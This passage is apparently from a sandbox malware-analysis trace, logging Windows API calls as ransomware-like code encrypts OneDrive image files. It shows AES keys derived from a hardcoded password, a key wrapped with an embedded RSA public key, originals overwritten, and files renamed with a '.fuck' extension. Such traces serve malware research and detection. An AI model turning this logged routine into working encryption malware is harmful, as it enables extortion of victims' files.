lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.861] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.862] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.864] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x10, lpOverlapped=0x0) returned 1 [0277.864] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x10, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x20) returned 1 [0277.864] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x20, lpOverlapped=0x0) returned 1 [0277.864] CloseHandle (hObject=0x5d3c) returned 1 [0277.864] CloseHandle (hObject=0x5d48) returned 1 [0277.864] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowiconwhite.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowiconwhite.svg"), bFailIfExists=0) returned 1 [0277.867] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg", dwFileAttributes=0x0) returned 1 [0277.868] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowiconwhite.svg.gsg")) returned 1 [0277.869] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowiconwhite.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\overflowIconWhite.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\overflowiconwhite.svg.fuck")) returned 1 [0277.870] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.870] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.870] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.870] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.870] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.870] GetLastError () returned 0x0 [0277.871] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\partiallyfreezing.svg")) returned 0x20 [0277.871] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg", dwFileAttributes=0x80) returned 1 [0277.871] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\partiallyfreezing.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.872] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\partiallyfreezing.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.873] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.873] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.875] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.875] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0277.875] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.875] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.875] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.875] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.875] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d248) returned 1 [0277.876] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d248, dwCertEncodingType=0x1, pInfo=0x2f362c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f362f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f362f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbf88) returned 1 [0277.876] CryptEncrypt (in: hKey=0x2fbf88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.876] CryptEncrypt (in: hKey=0x2fbf88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2d358*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2d358*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.876] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2d358*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2d358*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.877] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c9a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.882] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.882] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c9a0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.884] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c9a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.884] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.884] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c9a0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.885] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c9a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.885] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.885] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c9a0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.885] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c9a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.885] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.885] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c9a0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.885] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c9a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesRead=0x2b9ce68*=0x337, lpOverlapped=0x0) returned 1 [0277.885] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x337, dwBufLen=0x400 | out: pbData=0x2f5c9a0*, pdwDataLen=0x2b9ce68*=0x340) returned 1 [0277.885] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c9a0*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c9a0*, lpNumberOfBytesWritten=0x2b9ce68*=0x340, lpOverlapped=0x0) returned 1 [0277.885] CloseHandle (hObject=0x5d48) returned 1 [0277.885] CloseHandle (hObject=0x5d3c) returned 1 [0277.885] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\partiallyfreezing.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\partiallyfreezing.svg"), bFailIfExists=0) returned 1 [0277.888] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg", dwFileAttributes=0x0) returned 1 [0277.888] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\partiallyfreezing.svg.gsg")) returned 1 [0277.889] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\partiallyfreezing.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\partiallyFreezing.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\partiallyfreezing.svg.fuck")) returned 1 [0277.891] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.891] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.891] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.892] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.892] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.892] GetLastError () returned 0x0 [0277.892] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settings.svg")) returned 0x20 [0277.892] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg", dwFileAttributes=0x80) returned 1 [0277.892] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settings.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.893] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settings.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.894] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.894] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.896] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.896] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0277.896] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.896] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.896] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.896] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.896] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d4f0) returned 1 [0277.897] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d4f0, dwCertEncodingType=0x1, pInfo=0x2f37160*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37190*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37198*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbe48) returned 1 [0277.897] CryptEncrypt (in: hKey=0x2fbe48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.897] CryptEncrypt (in: hKey=0x2fbe48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2d3e0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2d3e0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.898] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2d3e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2d3e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.898] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.908] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.908] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.917] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x1ed, lpOverlapped=0x0) returned 1 [0277.917] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x1ed, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x1f0) returned 1 [0277.917] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x1f0, lpOverlapped=0x0) returned 1 [0277.917] CloseHandle (hObject=0x5d3c) returned 1 [0277.917] CloseHandle (hObject=0x5d48) returned 1 [0277.917] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settings.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settings.svg"), bFailIfExists=0) returned 1 [0277.920] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg", dwFileAttributes=0x0) returned 1 [0277.921] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settings.svg.gsg")) returned 1 [0277.922] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settings.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settings.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settings.svg.fuck")) returned 1 [0277.924] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.924] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.924] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.924] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.924] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.924] GetLastError () returned 0x0 [0277.924] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settingsdisabled.svg")) returned 0x20 [0277.924] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg", dwFileAttributes=0x80) returned 1 [0277.925] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settingsdisabled.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.926] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\settingsdisabled.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.927] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\settingsdisabled.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.927] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.930] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.930] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0277.930] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.930] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.930] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, 